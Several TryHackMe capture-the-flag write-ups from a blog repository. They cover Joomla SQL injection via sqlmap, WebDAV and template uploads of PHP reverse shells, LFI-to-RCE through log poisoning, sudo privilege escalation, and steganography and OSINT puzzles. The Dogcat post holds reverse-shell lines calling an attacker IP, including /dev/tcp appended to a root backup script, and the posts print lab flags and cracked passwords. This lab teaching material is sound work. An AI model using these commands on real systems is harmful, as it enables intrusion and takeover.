6 | --- 7 | [TryHackMe | Daily Bugle](https://tryhackme.com/room/dailybugle) 8 | 9 | ![https://i.imgur.com/4xkRRJC.png](https://i.imgur.com/4xkRRJC.png) 10 | 11 | Deploy the machine - it may take up to 2 minutes to configure (Hard 🥴) 12 | 13 | --- 14 | 15 | ### Setup 16 | 17 | ``` 18 | Desktop/TryHackMe/daily_bugle » nmap -A -vv 10.10.85.30 -oN nmap_result 19 | ``` 20 | 21 | ``` 22 | 22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0) 23 | | ssh-hostkey: 24 | | 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA) 25 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B 26 | | 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA) 27 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src= 28 | | 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519) 29 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX 30 | 31 | 80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.6.40) 32 | |_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA 33 | |_http-generator: Joomla! 
- Open Source Content Management 34 | | http-methods: 35 | |_ Supported Methods: GET HEAD POST OPTIONS 36 | | http-robots.txt: 15 disallowed entries 37 | | /joomla/administrator/ /administrator/ /bin/ /cache/ 38 | | /cli/ /components/ /includes/ /installation/ /language/ 39 | |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ 40 | |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40 41 | |_http-title: Home 42 | 43 | 3306/tcp open mysql syn-ack MariaDB (unauthorized) 44 | ``` 45 | 46 | ### Access the web server, who robbed the bank? 47 | 48 | ``` 49 | Spiderman 50 | ``` 51 | 52 | ![](../images/dailybugle/Untitled.png) 53 | 54 | --- 55 | 56 | ![https://i.imgur.com/fREnB0x.png](https://i.imgur.com/fREnB0x.png) 57 | 58 | Hack into the machine and obtain the root user's credentials. 59 | 60 | ### What is the Joomla version? 61 | 62 | ``` 63 | # As you can see on the nmap report the blog is using joomla, let's use some tools to enumerate the version and see if there is something interesting.. 64 | # https://github.com/Tuhinshubhra/CMSeeK 65 | [✔] CMS URL: https://joomla.org 66 | [✔] Joomla Version: 3.7.0 67 | ``` 68 | 69 | ![](../images/dailybugle/Untitled1.png) 70 | 71 | Nice, now we have the version let's see if there is an exploit in this version on exploitdb for example. 72 | 73 | ![](../images/dailybugle/Untitled2.png) 74 | 75 | Yep ! There is a SQLi available ! 🙌 76 | 77 | ![](../images/dailybugle/Untitled3.png) 78 | 79 | The exploit tells us to basically use sqlmap, well.. let's do that I guess. 
80 | 81 | ``` 82 | # sqlmap command 83 | sqlmap -u "http://10.10.85.30/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump 84 | ``` 85 | 86 | If you want, you can use this exploit written with python 87 | 88 | [NinjaJc01/joomblah-3](https://github.com/NinjaJc01/joomblah-3) 89 | 90 | ![](../images/dailybugle/Untitled4.png) 91 | 92 | ``` 93 | 94 | [$] Found user : 'Super User', 'jonah', 'jonah@tryhackme.com', 95 | Hashed password : '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' 96 | ``` 97 | 98 | Nice this is exactly what we wanted, let's crack the password. 99 | 100 | ### What is Jonah's cracked password? 101 | 102 | ``` 103 | # Let's crack the hash with hashcat / john 104 | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm 105 | ``` 106 | 107 | ![](../images/dailybugle/Untitled5.png) 108 | 109 | After ~40-45 minutes the password has been cracked : `spiderman123` 110 | 111 | Now that we have the administrator's password let's upload some reverse shell 👀 112 | 113 | ![](../images/dailybugle/Untitled6.png) 114 | 115 | Now that we successfully connected let's upload something. 116 | 117 | ![](../images/dailybugle/Untitled7.png) 118 | 119 | Go to the `Extensions/Templates/Templates` tab. 120 | 121 | And create a php page 122 | 123 | ![](../images/dailybugle/Untitled8.png) 124 | 125 | ##### Bonus, you can use my own extension to generate php shell and many more things ! 126 | 127 | [LasCC/Hack-Tools](https://github.com/LasCC/Hack-Tools) 128 | 129 | ![](../images/dailybugle/Untitled9.png) 130 | 131 | ![](../images/dailybugle/Untitled10.png) 132 | 133 | Now let's juste save and close the page to see the magic happen 😎 134 | 135 | ![](../images/dailybugle/Untitled11.png) 136 | 137 | And voilà ! You have successfully uploaded a reverse shell ! 
138 | 139 | Now we can access the configuration of joomla `/var/www/html/configuration.php` 140 | 141 | ![](../images/dailybugle/Untitled12.png) 142 | 143 | ``` 144 | Password : 'nv5uz9r3ZEDzVjNu'; 145 | ``` 146 | 147 | ### What is the user flag? 148 | 149 | ![](../images/dailybugle/Untitled13.png) 150 | 151 | To see what is the name of the user I cd into the `/home` directory to list all of the available users, and the rest is pretty straightforward, just SSH into the account with the password that you have cracked earlier. 152 | 153 | ``` 154 | # First flag 155 | 27a260fe3cba712cfdedb1c86d80442e 156 | ``` 157 | 158 | ### What is the root flag? 159 | 160 | ![](../images/dailybugle/Untitled14.png) 161 | 162 | Payload → gtfobins 163 | 164 | [yum | GTFOBins](https://gtfobins.github.io/gtfobins/yum/#sudo) 165 | 166 | ``` 167 | # Root flag 168 | # cat /root/root.txt 169 | eec3d53292b1821868266858d7fa6f79 170 | ``` 171 | 172 | -------------------------------------------------------------------------------- /src/content/blog/dav.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Dav - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-30 5 | description: "Writeup for the Dav room on TryHackMe" 6 | --- 7 | [TryHackMe | Dav](https://tryhackme.com/room/bsidesgtdav) 8 | 9 | Read user.txt and root.txt 10 | 11 | ### Setup 12 | 13 | ``` 14 | ➜ TryHackMe nmap -A -vv 10.10.33.240 15 | ``` 16 | 17 | ``` 18 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 19 | | http-methods: 20 | |_ Supported Methods: POST OPTIONS GET HEAD 21 | |_http-server-header: Apache/2.4.18 (Ubuntu) 22 | |_http-title: Apache2 Ubuntu Default Page: It works 23 | ``` 24 | 25 | ``` 26 | ➜ TryHackMe gobuster dir -u http://10.10.33.240 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 27 | =============================================================== 28 | Gobuster v3.0.1 29 | by OJ Reeves (@TheColonial) & Christian Mehlmauer 
(@_FireFart_) 30 | =============================================================== 31 | [+] Url: http://10.10.33.240 32 | [+] Threads: 10 33 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 34 | [+] Status codes: 200,204,301,302,307,401,403 35 | [+] User Agent: gobuster/3.0.1 36 | [+] Timeout: 10s 37 | =============================================================== 38 | 2020/05/30 16:54:40 Starting gobuster 39 | =============================================================== 40 | /webdav (Status: 401) 41 | ``` 42 | 43 | ``` 44 | # There is a creds to acces the page just google webdav default creds" 45 | http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html 46 | user: wampp 47 | pass: xampp 48 | ``` 49 | 50 | ![](https://imgur.com/BKDICjY.png) 51 | 52 | ``` 53 | # Don't try to crack the hash its a rabit hole (sad life :'c) 54 | wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91 55 | ``` 56 | 57 | Let's get a reverse shell on the server ! 🤑 58 | 59 | [Learning Pentesting with Metasploitable3: Exploiting WebDAV](https://resources.infosecinstitute.com/learning-pentesting-metasploitable3-exploiting-webdav-2/#gref) 60 | 61 | ``` 62 | ➜ TryHackMe curl –v --user wampp:xampp http://10.10.33.240/webdav/verify.txt -X PUT 63 | curl: (3) Failed to convert –v to ACE; string contains a disallowed character 64 | 65 | 66 | 67 | 201 Created 68 | 69 |

    Created

    70 |

    Resource /webdav/verify.txt has been created.

    71 |
    72 |
    Apache/2.4.18 (Ubuntu) Server at 10.10.33.240 Port 80
    73 | 74 | ``` 75 | 76 | ![](https://imgur.com/xtdInMA.png) 77 | 78 | Nice, let's try with a php reverse shell shall we ? 😃 79 | 80 | ### #1 user.txt 81 | 82 | ``` 83 | ➜ TryHackMe curl --user wampp:xampp http://10.10.33.240/webdav/reverse-shell.php --upload-file reverse-shell.php -X PUT 84 | ➜ TryHackMe nc -lvnp 4444 85 | ``` 86 | 87 | ![](https://imgur.com/iIe25rq.png) 88 | 89 | ``` 90 | $ cd /home 91 | $ ls 92 | merlin 93 | wampp 94 | $ cd merlin 95 | $ ls 96 | user.txt 97 | $ cat user.txt 98 | 449b40fe93f78a938523b7e4dcd66d2a 99 | ``` 100 | 101 | ### #2 root.txt 102 | 103 | ``` 104 | $ sudo -l 105 | Matching Defaults entries for www-data on ubuntu: 106 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 107 | 108 | User www-data may run the following commands on ubuntu: 109 | (ALL) NOPASSWD: /bin/cat 110 | $ sudo cat /root/ 111 | cat: /root/: Is a directory 112 | $ sudo cat /root/root.txt 113 | 101101ddc16b0cdf65ba0b8a7af7afa5 114 | ``` 115 | 116 | 117 | -------------------------------------------------------------------------------- /src/content/blog/dogcat.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Dogcat - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-02 5 | description: "Writeup for the Dogcat room on TryHackMe" 6 | --- 7 | [TryHackMe | Dogcat](https://tryhackme.com/room/dogcat) 8 | 9 | ![](https://i.imgur.com/mj1rbea) 10 | 11 | I made this website for viewing cat and dog images with PHP. If you're feeling down, come look at some dogs/cats! 
12 | 13 | **This machine may take a few minutes to fully start up.** 14 | 15 | --- 16 | 17 | ### Setup 18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.121.12 21 | ``` 22 | 23 | ``` 24 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 25 | | ssh-hostkey: 26 | | 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA) 27 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H 28 | | 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA) 29 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s= 30 | | 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519) 31 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I 32 | 33 | 80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian)) 34 | | http-methods: 35 | |_ Supported Methods: GET HEAD POST OPTIONS 36 | |_http-server-header: Apache/2.4.38 (Debian) 37 | |_http-title: dogcat 38 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 39 | ``` 40 | 41 | ### #1 What is flag 1? 42 | 43 | I'm going to try some basic LFI 44 | 45 | ![](https://imgur.com/IeJGwlC.png) 46 | 47 | ![](https://imgur.com/UMyhkfJ.png) 48 | 49 | I'm going to try with php filter let's see if this works.. 50 | 51 | [LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/) 52 | 53 | ![](https://imgur.com/FXeOWux.png) 54 | 55 | ``` 56 | php://filter/convert.base64-encode/resource=cat 57 | # Let's decode the base64 to see the result 58 | 59 | ``` 60 | 61 | ![](https://imgur.com/jF0hO89.png) 62 | 63 | Nice ! 
We can see the php code let's see if there is something in the directory 64 | 65 | ``` 66 | php://filter/convert.base64-encode/resource=./cat/../index 67 | 68 | 69 | 70 | 71 | dogcat 72 | 73 | 74 | 75 | 76 |

    dogcat

    77 | a gallery of various dogs or cats 78 | 79 |
    80 |

    What would you like to see?

    81 |
    82 | 96 |
    97 | 98 | 99 | 100 | ``` 101 | 102 | There we go ! We have the php code let's see if we can do something with it 🤤 103 | 104 | So.. There is no way that we can exploit the php code so let's look at the nmap result and we have the apache version, let's see if we can see the log. 105 | 106 | ``` 107 | By default, you can find the Apache access log file at the following path: 108 | 109 | /var/log/apache/access. log. 110 | /var/log/apache2/access. log. 111 | /etc/httpd/logs/access_log. 112 | ``` 113 | 114 | If we try with this following url 115 | 116 | ``` 117 | php://filter/convert.base64-encode/resource=./cat/../../../../../../../../../../../../../var/log/apache2/access.log 118 | ``` 119 | 120 | There will be an error its because the code don't like the ".log" let's correct that 😃 121 | 122 | On the php code there is this ternary condition "\$\_GET["ext"]" let's use that at the end 123 | 124 | ![](https://imgur.com/25dLhcZ.png) 125 | 126 | Nice ! It worked !! 😵 127 | 128 | Let's decode the base64 to see the result 😊 129 | 130 | ``` 131 | 10.9.2.228 - - [02/Jun/2020:20:38:04 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./cat/../../../../../../../../../../../../../var/log/apache2/access.log&ext HTTP/1.1" 200 2890 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 132 | ``` 133 | 134 | Now let's see if we can have an RCE attack 🤑 135 | 136 | ![](https://imgur.com/gZZJUJR.png) 137 | 138 | And there it is ! If we put "" on the user-agent we can execute code on the remote server. 139 | 140 | Let's get a reverse shell using the same method.. 141 | 142 | [php | GTFOBins](https://gtfobins.github.io/gtfobins/php/#reverse-shell) 143 | 144 | ``` 145 | 146 | php -r '$sock=fsockopen("10.9.2.228"),"",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 147 | ``` 148 | 149 | ![](https://imgur.com/2bjNiUu.png) 150 | 151 | ``` 152 | $ cat flag.php 153 | 156 | ``` 157 | 158 | ### #2 What is flag 2? 159 | 160 | ``` 161 | $ cd .. 
162 | $ pwd 163 | /var/www 164 | $ ls 165 | flag2_QMW7JvaY2LvK.txt 166 | html 167 | $ cat flag2_QMW7JvaY2LvK.txt 168 | THM{LF1_t0_RC3_aec3fb} 169 | ``` 170 | 171 | ### #3 What is flag 3? 172 | 173 | ``` 174 | $ sudo -l 175 | Matching Defaults entries for www-data on 17d35d82c239: 176 | env_reset, mail_badpass, 177 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 178 | 179 | User www-data may run the following commands on 17d35d82c239: 180 | (root) NOPASSWD: /usr/bin/env 181 | ``` 182 | 183 | [https://gtfobins.github.io/gtfobins/env/#sudo](https://gtfobins.github.io/gtfobins/env/#sudo) 184 | 185 | ``` 186 | sudo env /bin/sh 187 | ``` 188 | 189 | ``` 190 | id 191 | uid=0(root) gid=0(root) groups=0(root) 192 | cd /root 193 | ls 194 | flag3.txt 195 | cat flag3.txt 196 | THM{D1ff3r3nt_3nv1ronments_874112} 197 | ``` 198 | 199 | ### #4 What is flag 4? 200 | 201 | ``` 202 | find / -type f -name *.sh 2>/dev/null 203 | /opt/backups/backup.sh 204 | /etc/init.d/hwclock.sh 205 | /lib/init/vars.sh 206 | /usr/local/lib/php/build/ltmain.sh 207 | /usr/share/debconf/confmodule.sh 208 | ``` 209 | 210 | ``` 211 | cd /opt/backups 212 | ls 213 | backup.sh 214 | backup.tar 215 | cat backup.sh 216 | #!/bin/bash 217 | tar cf /root/container/backup/backup.tar /root/container 218 | ``` 219 | 220 | Let's add a reverse shell on the bash script and get hopefully the last flag 🤓 221 | 222 | ``` 223 | echo '#!/bin/bash' > backup.sh;echo 'bash -i >& /dev/tcp/10.9.2.228/9002 0>&1' >> backup.sh 224 | ``` 225 | 226 | ``` 227 | ➜ ~ nc -lnvp 9002 228 | listening on [any] 9002 ... 
229 | connect to [10.9.2.228] from (UNKNOWN) [10.10.121.12] 43500 230 | bash: cannot set terminal process group (5464): Inappropriate ioctl for device 231 | bash: no job control in this shell 232 | root@dogcat:~# ls 233 | ls 234 | container 235 | flag4.txt 236 | root@dogcat:~# cat flag4* 237 | cat flag4* 238 | THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} 239 | root@dogcat:~# 240 | ``` 241 | 242 | 243 | -------------------------------------------------------------------------------- /src/content/blog/easy-steganography.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Easy Steganography - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-15 5 | description: "Writeup for the Easy Steganography room on TryHackMe" 6 | --- 7 | [TryHackMe | Easy Steganography](https://tryhackme.com/room/easysteganography) 8 | 9 | Download the zip file and start the hunt. Good luck! 10 | 11 | ### #1 Flag 1 12 | 13 | ``` 14 | ➜ TryHackMe zsteg -a flag1.jpeg 15 | [!] 
#> 16 | ``` 17 | 18 | As you can see there is something wrong with this image let's see the hex code of it 19 | 20 | ![](https://imgur.com/ASD7OKz.png) 21 | 22 | ``` 23 | ➜ TryHackMe strings flag1.jpeg | grep "St" 24 | D`St 25 | St3g4n0 26 | ``` 27 | 28 | ``` 29 | St3g4n0 30 | ``` 31 | 32 | ### #2 Flag 2 33 | 34 | ``` 35 | ➜ TryHackMe stegoveritas flag2.jpeg 36 | ``` 37 | 38 | ![](https://imgur.com/ecLbV9Q.png) 39 | 40 | ``` 41 | Algorithm 42 | ``` 43 | 44 | ### #3 Flag 3 45 | 46 | ``` 47 | ➜ TryHackMe stegoveritas flag3.jpeg 48 | ``` 49 | 50 | ``` 51 | comment: "The passphrase to this challenge is Math" 52 | ``` 53 | 54 | ### #4 Flag 4 55 | 56 | ``` 57 | ➜ TryHackMe strings flag4.jpeg 58 | ``` 59 | 60 | ![](https://imgur.com/VRHCURv.png) 61 | 62 | ``` 63 | TryHardered 64 | ``` 65 | 66 | 67 | -------------------------------------------------------------------------------- /src/content/blog/geolocating-images.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Geolocating Images - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-24 5 | description: "Writeup for the Geolocating Images on TryHackMe" 6 | --- 7 | [TryHackMe | Geolocating Images](https://tryhackme.com/room/geolocatingimages) 8 | 9 | Where is image 1? 10 | 11 | (Use Google Reverse Search and revel in all the airplanes it shows you, which by the way, isn't the right answer). 12 | 13 | Try Yandex Reverse Image search. Look at the differences! 14 | 15 | ### #1 Where in the world is image 1? The answer is the country name. 16 | 17 | ![](https://imgur.com/9QUIrGj.png) 18 | 19 | ![](https://imgur.com/1fkczwe.png) 20 | 21 | ``` 22 | China 23 | ``` 24 | 25 | --- 26 | 27 | Where was image 2 taken? Specifically, I'm looking for the name of the place that has likely set up the webcam. You'll know it when you see it! 28 | 29 | ### #2 Where was image 2 taken? 
30 | 31 | ![](https://imgur.com/56Zh3s3.png) 32 | 33 | ``` 34 | Wrigleyville Sports 35 | ``` 36 | 37 | --- 38 | 39 | Please do not try to use reverse image searches for this one! Pay close attention to what is in the image. 40 | 41 | I want you to answer with the name of the place the webcam is facing. 42 | 43 | Note: the name of this location on Google Maps is not the right answer. If you take that location name and paste it back into search, you'll find out there's about a million of them. To make this harder, I'm looking for the name that specifically identifies this location. When you enter this name, it'll be the only one that turns up on Google Maps. 44 | 45 | ### #3 Where was image 3 taken? 46 | 47 | [Webcamtaxi Search Engine of Live World Webcams](https://www.webcamtaxi.com/en/search.html?searchword=paris&searchphrase=all) 48 | 49 | ![](https://imgur.com/Vful2V0.png) 50 | 51 | ![](https://imgur.com/eiWDGhl.png) 52 | 53 | ``` 54 | Meudon Observatory 55 | ``` 56 | 57 | --- 58 | 59 | Look at image 4. What do you see? What can you observe? 60 | 61 | ### #4 Where is image 4 taken? 62 | 63 | This is a easy one the is a popular cross way in London 64 | 65 | [Abbey Road](https://www.visitlondon.com/things-to-do/place/35809687-abbey-road) 66 | 67 | ``` 68 | Abbey Road 69 | ``` 70 | 71 | 72 | -------------------------------------------------------------------------------- /src/content/blog/git-happens.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Git Happens - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-08-21 5 | description: "Writeup for the Git Happens room" 6 | --- 7 | [TryHackMe | Git Happens](https://tryhackme.com/room/githappens) 8 | 9 | Boss wanted me to create a prototype, so here it is! We even used something called "version control" that made deploying this really easy! 10 | 11 | Can you find the password to the application? 
12 | 13 | --- 14 | 15 | ### Setup 16 | 17 | ``` 18 | └──╼ $ nmap -A -T4 10.10.58.41 19 | ``` 20 | 21 | ``` 22 | 80/tcp open http nginx 1.14.0 (Ubuntu) 23 | | http-git: 24 | | 10.10.58.41:80/.git/ 25 | | Git repository found! 26 | |_ Repository description: Unnamed repository; edit this file 'description' to name the... 27 | | http-methods: 28 | |_ Supported Methods: GET HEAD 29 | |_http-server-header: nginx/1.14.0 (Ubuntu) 30 | |_http-title: Super Awesome Site! 31 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 32 | ``` 33 | 34 | As you can see the nmap scan found a ".git" repertory on the website, let's use some tools to get all the data. 35 | 36 | [internetwache/GitTools](https://github.com/internetwache/GitTools) 37 | 38 | ![](https://i.imgur.com/XXygrPA.png) 39 | 40 | ``` 41 | └──╼ $ ./gitdumper.sh http://10.10.58.41/.git/ . 42 | ``` 43 | 44 | Once the dumper script get all the data let's use the extractor script to have all the source code. 45 | 46 | ![](https://i.imgur.com/8DyZR2H.png) 47 | 48 | ``` 49 | └──╼ $ ./extractor.sh ~/Desktop/TryHackMe/git-thm/GitTools/Dumper/ . 50 | ``` 51 | 52 | ![](https://i.imgur.com/a53y7oc.png) 53 | 54 | As you can see the script created some directory, let's see if the password is in there. 55 | 56 | ### **#1 Find the Super Secret Password** 57 | 58 | ![](https://i.imgur.com/SzdvdmG.png) 59 | 60 | ``` 61 | Th**_**_*_****_****_******_*******! 62 | ``` 63 | 64 | 65 | -------------------------------------------------------------------------------- /src/content/blog/jack-of-all-trades.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Jack-of-All-Trades - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-28 5 | description: "Writeup for the Jack-of-All-Trades - boot-to-root originally designed for Securi-Tay 2020" 6 | --- 7 | [TryHackMe | Jack-of-All-Trades](https://tryhackme.com/room/ctfcollectionvol2) 8 | 9 | Jack is a man of a great many talents. 
The zoo has employed him to capture the 10 | penguins due to his years of penguin-wrangling experience, but all is not as it seems... 11 | 12 | We must stop him! Can you see through his facade of a forgetful old toy-maker and bring this lunatic down? 13 | 14 | --- 15 | 16 | ### Setup 17 | 18 | ``` 19 | nmap -A -vv 10.10.134.255 20 | ``` 21 | 22 | ``` 23 | 22/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) 24 | | http-methods: 25 | |_ Supported Methods: GET HEAD POST OPTIONS 26 | |_http-server-header: Apache/2.4.10 (Debian) 27 | |_http-title: Jack-of-all-trades! 28 | |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 29 | 30 | 80/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0) 31 | | ssh-hostkey: 32 | | 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA) 33 | | ssh-dss AAAAB3NzaC1kc3MAAACBANucPy+D67M/cKVTYaHYYpt9bqPviYbWW/4+BFnUOQoNordc9Pc+8CauJqNFiebIqpKYKXhpEAt82m1IjQh8EmWdJYcQnkMFgukM3/mGjngXTbUO8vAbi53Zy8wwOaBlmRK9mvfAYEWPkcjzRmYgSp51TgEtSGWIyAkc1Lx6YVtDAAAAFQCsIgZJlrsYvAtF7Rmho7lIdn0WOwAAAIEApri35SyOophhqX45JcDpVASe3CSs8tPMGoOc0I9ZtTGt5qyb1cl7N3tXsP6mlrw4d4YNo8ct0w6TjsxPcJjGitRQ+SILWHy72XZ5Chde6yewKB5BeBjXrYvRR1rW+Tpia5kyjB4s0mGB7o3FMjX/dT+ISqYvZeVa7mQnBo0f0XMAAACAP89Ag2kmcs0FBt7KCBieH3UB6gF+LdeRVJHio5p4VQ8cTY1NZDyWqudS1TJq1BAToJSz9MqwUwzlILjRjuGQtylpssWSRbHyM0aqmJdORSMOCMUiEwyfk6T8+Vmama/AN7/htZeWBjWVeVEnbYJJQ6kPSCvZodMdOggYXcv32CA= 34 | | 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA) 35 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbCwl2kyYWpv1DPDF0xQ5szNR1muMph6gJMJFw9VubKkSvHMWfg7CaCNcyo1QR5dg9buIygIGab8e9aigJdjQUY4XeBejwGe+vAA8RtPMoiLclR6g5qAqVQSeZ2FBzMrmkyKIgsSDb8tP+czpzn/Gp1HzDtiYUvleTvO2xEZ3k2Xz8YDvPlkV4zAIPzZSSZ8BABPYsBrePIwMpr/ZjeeiE59DlkUIv8x8M0z9KOls9zaeqFsbWrfMZzFgtPP+KILN6GrGijxgcGq5mDwvr67oHL3T3FtpReE+UZ/CafmzO/2Ls8XstmUiNeMaNBYtc6703/84bpL0uLp/pkILS8eqX 36 | | 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA) 37 | | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO4p2E6NglzDeP40tJ42LjWaVrOcINmy42cspAv8DSzGD0K+V3El/tyGBxCJlMMR7wbN0968CQl61x0AkkAHLFk= 38 | | 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519) 39 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6jYsDJq1mWTDx7D+p3mMbqXhu9OhhW2p1ickLCdZ9E 40 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 41 | ``` 42 | 43 | As you can see by the nmap scan the port 22 is a web server. 44 | 45 | ![](https://imgur.com/HbuGSmv.png) 46 | 47 | [How to allow a restricted port?](https://support.mozilla.org/en-US/questions/1083282#question-reply) 48 | 49 | ![](https://imgur.com/8MM4L6y.png) 50 | 51 | ![](https://imgur.com/BAAHVL1.png) 52 | 53 | ![](https://imgur.com/x9t2KSO.png) 54 | 55 | Nice ! It worked, let's see if there is some hidden directory 😊 56 | 57 | ``` 58 | ➜ TryHackMe gobuster dir -u http://10.10.134.255:22/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 59 | ``` 60 | 61 | ![](https://imgur.com/xrD1K8Z.png) 62 | 63 | On source code of the homepage you can see there is some hidden message and a assets called "assets/stego.jpg" let's download the image and decode the message shall we ? 64 | 65 | ![](https://imgur.com/Eb7xkuj.png) 66 | 67 | ``` 68 | Remember to wish Johny Graves well with his crypto jobhunting! 69 | His encoding systems are amazing! Also gotta remember your password: u?WtKSraq 70 | ``` 71 | 72 | ![](https://imgur.com/XuUoZk8.png) 73 | 74 | Well, let's try the other images 😞 75 | 76 | ![](https://imgur.com/VvCRC8g.png) 77 | 78 | ![](https://imgur.com/pDG3iCg.png) 79 | 80 | ``` 81 | Username: jackinthebox 82 | Password: TplFxiSHjY 83 | ``` 84 | 85 | Great ! we found some credentials let's find the cms 🤨 86 | 87 | Ok ! I found it, to find the cms you need to go to the homepage and see the source code of the page. 
